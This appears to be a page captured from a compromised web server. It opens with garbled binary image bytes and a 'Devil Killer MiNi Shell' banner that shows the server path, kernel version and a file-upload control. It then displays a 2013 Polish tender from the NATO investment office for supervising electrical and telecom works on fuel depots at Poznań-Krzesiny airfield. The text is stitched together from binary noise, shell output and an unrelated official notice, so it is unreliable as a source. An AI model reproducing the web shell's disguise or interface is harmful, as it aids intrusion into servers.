JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130405/133790-N-2013.html

<p class="kh_header"><b>Warszawa: Pełnienie nadzoru inwestorskiego nad robotami budowlanymi w branżach:
elektrycznej oraz telekomunikacyjnej (teletechnicznej), przy kontynuacji robót budowlano-montażowych na lotnisku Poznań-Krzesiny w ramach zadania NSIP
nr 2AF 15105 pod nazwą Budowa lotniskowych składów MPS-1 i MPS-2
wraz z rurociągiem przesyłowym</b><br>
<b>Numer ogłoszenia: 133790 - 2013; data zamieszczenia: 05.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Inwestycji Organizacji Traktatu Północnoatlantyckiego , ul. Nowowiejska 28a, 02-010 Warszawa, woj. mazowieckie, tel. 22 6874328, faks 22 6874329.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ziotp.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego nad robotami budowlanymi w branżach:
elektrycznej oraz telekomunikacyjnej (teletechnicznej), przy kontynuacji robót budowlano-montażowych na lotnisku Poznań-Krzesiny w ramach zadania NSIP
nr 2AF 15105 pod nazwą Budowa lotniskowych składów MPS-1 i MPS-2
wraz z rurociągiem przesyłowym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego nad robotami budowlanymi w branżach: 
1) Część 1 - elektrycznej,
2) Część 2 - telekomunikacyjnej (teletechnicznej),
przy kontynuacji robót budowlano-montażowych na lotnisku Poznań-Krzesiny
w ramach zadania NSIP  nr 2AF 15105 pod nazwą Budowa lotniskowych składów MPS-1 i MPS-2 wraz z rurociągiem przesyłowym.
2. Kontynuacja budowy lotniskowych składów MPS-1 i MPS-2 wraz z rurociągiem przesyłowym realizowana jest przez wykonawcę robót budowlano- montażowych (dalej: WRB-M) na podstawie umowy, zwanej dalej Umową z WRB-M, zgodnie z zakresem rzeczowym określonym w Harmonogramie Rzeczowo-Finansowym (dalej: HRF) i dokumentacją projektową.
HRF i dokumentacja projektowa zostaną udostępnione, w siedzibie Zamawiającego przed terminem składania ofert, Wykonawcy lub osobom przez niego upoważnionym, posiadającym poświadczenie bezpieczeństwa uprawniające do dostępu do informacji niejawnych o klauzuli POUFNE i ważne zaświadczenie o odbyciu szkolenia z ochrony informacji niejawnych. 
Realizacja robót przez WRB-M odbywać się będzie w dwóch etapach obejmujących
w szczególności:
Etap I:
- przygotowanie i przekazanie użytkownikowi do eksploatacji składu MPS-1 z całą infrastrukturą towarzyszącą wraz z rurociągiem przesyłowym na odcinku od tacy szczelnej na składzie MPS-2 do pompowni technologicznej na składzie MPS-1;
- przygotowanie i przekazanie użytkownikowi do eksploatacji obiektów na składzie MPS-2, które integralnie są związane z pracą składu MPS-1.
Etap II:
- przygotowanie i przekazanie użytkownikowi do eksploatacji składu MPS-2.
Termin realizacji robót przez WRB-M: od dnia 22.10.2012 r. do dnia 31.12.2014 r.,
w tym:
- Etap I - zakończenie robót budowlano-montażowych i naprawczych w terminie
do dnia 30.06.2013 r., rozruch i przekazanie do użytkowania do dnia 30.08.2013 r.;
- Etap II - przekazanie do użytkowania do dnia 31.12.2014 r.
Teren budowy został przekazany WRB-M w dniu 26.10.2012 r.
Obecnie realizowane są przez WRB-M roboty budowlano-montażowe i naprawcze.
Wspólna inspekcja formalnego odbioru (ang. Joint Formal Acceptance Inspection), zgodnie z procedurami NATO, odbędzie się po oddaniu zadania do użytkowania,
w terminie wyznaczonym przez KI NATO.
Przedmiot zamówienia nie obejmuje:
- sprawowania nadzoru nad dostawą-wykonaniem podziemnych zbiorników magazynowych o osiach pionowych na składzie MPS-2;
- nadzoru inwestorskiego w branżach: sanitarnej (technologicznej), konstrukcyjno-budowlanej, drogowej, ochrony środowiska i kolejowej, który sprawowany jest
na podstawie odrębnych umów zawartych przez Zamawiającego.
3. Inne cechy (parametry) przedmiotu zamówienia:
Przewidywany zakres prac obejmuje:
1) sprawowanie nadzoru inwestorskiego z uwzględnieniem specyfiki każdej z części zamówienia, o której mowa w pkt. 1 powyżej, (wraz z kontrolą rozliczeń) w zakresie określonym przepisami prawa budowlanego;
2) reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli zgodności jej realizacji z podstawowymi dokumentami, w tym w szczególności
z decyzją o pozwoleniu na budowę wraz z projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót, zakresem robót, kosztorysem ofertowym oraz zgodnie z aktualnymi przepisami i zasadami wiedzy technicznej;
3) sprawdzanie jakości wykonywanych robót i zgodności dowodów jakości wbudowywanych wyrobów budowlanych, określonych w projekcie budowlanym
i specyfikacji technicznej wykonania i odbioru robót, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie oraz wyprodukowanych poza krajami członkowskimi NATO;
4) sprawdzanie i odbiór robót budowlanych zanikających lub ulegających zakryciu przed ich zakryciem, uczestniczenie w próbach, badaniach, sprawdzeniach i odbiorach technicznych oraz sprawdzanie inwentaryzacji geodezyjnej powykonawczej
z potwierdzaniem ww. czynności stosowną adnotacją w dzienniku budowy;
5) sprawdzanie kompletności przedstawionych przez Wykonawcę dokumentów 
i zaświadczeń, niezbędnych do przeprowadzenia odbioru robót;
6) opiniowanie zasadności zgłoszonych przez WRB-M rozwiązań zamiennych, robót dodatkowych lub robót zaniechanych, przy współpracy z Zamawiającym oraz opiniowanie wymaganych dokumentów, w szczególności protokołów konieczności,
a także przedstawianie propozycji ewentualnych zmian projektowych wraz
z uzasadnieniem;
7) wydawanie kierownikowi budowy poleceń, potwierdzonych wpisami 
do dziennika budowy, z wyznaczonymi terminami ich wykonania, dotyczących
w szczególności: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań (w tym wymagających odkrycia robót lub elementów zakrytych)
i zawiadamianie o nich na piśmie Zamawiającego, a także przedstawianie opinii dotyczących prowadzonych robót budowlanych oraz zabudowanych wyrobów budowlanych lub urządzeń technicznych, w razie zastrzeżeń co do ich jakości lub braku dowodów dopuszczenia do stosowania w budownictwie;
8) żądanie od kierownika budowy dokonania poprawek, bądź ponownego wykonania uprzednio wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie 
albo spowodować niedopuszczalną niezgodność z dokumentacją projektową, w tym z projektem budowlanym lub decyzją;
9) stwierdzanie aktualnego stanu robót w razie przerwy w robotach oraz w innych wypadkach, gdy zachodzi potrzeba ustalenia ilości, jakości i wartości robót
w zakresie niezbędnym do rozliczeń z Zamawiającym;
10) bieżące potwierdzanie zapisów dokonywanych przez kierownika budowy w książce obmiarów;
11) prowadzenie nadzoru nad prawidłowym przebiegiem robót zgodnie z Umową zawartą z WRB-M oraz systematyczne gromadzenie i przygotowywanie we współdziałaniu z pozostałymi uczestnikami procesu inwestycyjnego materiałów analitycznych niezbędnych do rozliczenia wykonanych robót i oceny osiągniętych efektów rzeczowych lub gospodarczych;
12) kontrolowanie rozliczeń budowy, stosownie do zasad określonych w Umowie 
z WRB-M w zakresie procedur odbiorowych i płatności dla odbiorów częściowych
i końcowych, w szczególności sprawdzenie i weryfikacja kosztorysów powykonawczych dla robót naprawczych i niewykonanych przez poprzedniego wykonawcę robót budowlano-montażowych;
13) realizowanie innych obowiązków, wynikających ze sprawowanego nadzoru inwestorskiego, a także kontrolowanie na bieżąco zgodności realizacji robót oraz terminowości ich wykonania, zgodnie z HRF do Umowy z WRB-M;
14) funkcję Koordynatora inspektorów nadzoru sprawuje Inspektor nadzoru w branży sanitarnej (technologicznej);
15) Koordynatorowi inspektorów nadzoru podlegają Inspektorzy nadzoru w branżach: konstrukcyjno-budowlanej, drogowej, elektrycznej, telekomunikacyjnej (teletechnicznej) a także ochrony środowiska oraz kolejowej;
16) sporządzanie przez poszczególnych Inspektorów nadzoru i przedstawianie Koordynatorowi inspektorów nadzoru miesięcznych sprawozdań rzeczowo-finansowych z postępu realizacji robót w stosunku do HRF WRB-M w zakresie nadzorowanej branży (w sposób narastający), w terminie do 7-go dnia miesiąca, następującego po miesiącu, którego sprawozdanie dotyczy, według wzoru Zamawiającego, stanowiącego załącznik nr 3 do Umowy;
17) Koordynator będzie sporządzał i przedstawiał Zamawiającemu zbiorcze miesięczne sprawozdania rzeczowo-finansowe z postępu realizacji robót w stosunku do HRF WRB-M z realizacji całości robót we wszystkich branżach (w sposób narastający), w terminie do 10-go dnia miesiąca, następującego po miesiącu, którego sprawozdanie dotyczy, według wzoru Zamawiającego, stanowiącego załącznik nr 3 do Umowy;
18) udział we wspólnej inspekcji formalnego odbioru JFAI (ang. Joint Formal Acceptance Inspection);
19) nadzór i kontrola nad prawidłowym prowadzeniem dziennika budowy oraz księgi obmiaru robót;
20) informowanie Zamawiającego o wszystkich istotnych sprawach mających wpływ  na realizację robót.
4. Zakres obowiązków i uprawnień Wykonawcy określony jest w szczególności w ustawie z dnia 07.07.1994 r. Prawo budowlane (t.j. Dz. U. z 2010 r. Nr 243, poz. 1623).
5. Wykonawca nie jest uprawniony do:
1) wprowadzania jakichkolwiek zmian w zakresie obowiązków WRB-M, wynikających z umowy Zamawiającego z WRB-M, w szczególności  w przedmiocie robót zamiennych, zaniechanych, dodatkowych i uzupełniających;
2) wprowadzania zmian w zakresie technologii wykonywania robót przez WRB-M, 
w tym m.in. zmian materiałów bez pisemnej zgody Zamawiającego.
6. Odbiór i przekazanie do użytkowania Etapu I i II należy przeprowadzić według procedur opisanych w Instrukcji zatytułowanej: Wewnętrzne wytyczne Procedur odbiorowych zakończonych Zadań Programu NSIP i przekazania ich organom sprawującym trwały zarząd MON i użytkownikom, stanowiącej załącznik do Decyzji nr 48/2011 Dyrektora Zakładu Inwestycji Organizacji Traktatu Północnoatlantyckiego z dnia 16.03.2011 r. Instrukcja stanowi Załącznik nr 8 do SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwości udzielenia Wykonawcy zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga w tym zakresie od Wykonawcy, aby:
- Część 1 - branża elektryczna - posiadał odpowiednie uprawnienia
do wykonywania samodzielnych funkcji technicznych w budownictwie lub dysponował osobą posiadającą odpowiednie uprawnienia
do wykonywania samodzielnych funkcji technicznych w budownictwie,
tj. uprawnienia budowlane do nadzorowania robót budowlanych
w branży elektrycznej oraz był wpisany lub osoba, którą dysponuje była wpisana, na listę członków właściwej Okręgowej Izby Inżynierów Budownictwa;
- Część 2 - branża telekomunikacyjna (teletechniczna) - posiadał odpowiednie uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie lub dysponował osobą posiadającą odpowiednie uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie, tj. uprawnienia budowlane do nadzorowania robót budowlanych w branży telekomunikacyjnej (teletechnicznej) oraz był wpisany lub osoba, którą dysponuje była wpisana, na listę członków właściwej Okręgowej Izby Inżynierów Budownictwa</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga w tym zakresie od Wykonawcy, aby wykazał, że:
- Część 1 - branża elektryczna - inspektor nadzoru posiada co najmniej
3-letnie doświadczenie zawodowe - poparte referencjami;
- Część 2 - branża telekomunikacyjna (teletechniczna) - inspektor nadzoru posiada co najmniej 3-letnie doświadczenie zawodowe przy nadzorowaniu robót w zakresie automatyki i sterowania instalacji przemysłowych lub paliwowych - poparte referencjami</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga w tym zakresie od Wykonawcy, aby:
- Część 1 - branża elektryczna - wskazał osobę, która będzie uczestniczyła w wykonywaniu części zamówienia, wraz z informacjami na temat jej kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego
do wykonania zamówienia, a także zakresu wykonywanych przez nią czynności, oraz informacją o podstawie do dysponowania tą osobą;
- Część 2 - branża telekomunikacyjna (teletechniczna) - wskazał osobę, która będzie uczestniczyła w wykonywaniu części zamówienia, wraz
z informacjami na temat jej kwalifikacji zawodowych, doświadczenia
i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nią czynności, oraz informacją o podstawie
do dysponowania tą osobą</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga w tym zakresie od Wykonawcy, aby:
- Część 1 - branża elektryczna - wskazał osobę, która będzie uczestniczyła w wykonywaniu części zamówienia, wraz z informacjami na temat jej kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego
do wykonania zamówienia, a także zakresu wykonywanych przez nią czynności, oraz informacją o podstawie do dysponowania tą osobą;
- Część 2 - branża telekomunikacyjna (teletechniczna) - wskazał osobę, która będzie uczestniczyła w wykonywaniu części zamówienia, wraz
z informacjami na temat jej kwalifikacji zawodowych, doświadczenia
i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nią czynności, oraz informacją o podstawie
do dysponowania tą osobą</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga w tym zakresie od Wykonawcy, aby wykazał, że posiada opłaconą polisę lub inny dokument potwierdzający, że jest ubezpieczony
od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej
z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż
200.000,00 zł (słownie: dwieście tysięcy złotych), np. obowiązkowe ubezpieczenie odpowiedzialności cywilnej inżynierów budownictwa, bez względu na ilość części dla których została złożona.
Należy załączyć również dowód opłacenia polisy w przypadku płatności jednorazowej lub dowód opłacenia ostatniej raty w przypadku płatności
w ratach</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Uprawnienia budowlane, potwierdzające prawo do wykonywania samodzielnych funkcji technicznych w budownictwie do nadzorowania robót budowlanych, zgodnie z Działem V ust. 1 pkt 1 lit. a SIWZ;
2. Dokumenty i oświadczenia dotyczące ochrony informacji niejawnych:
a) w przypadku Wykonawcy posiadającego Świadectwo Bezpieczeństwa Przemysłowego (ŚBP) co najmniej trzeciego stopnia o klauzuli POUFNE 
lub wyższej:
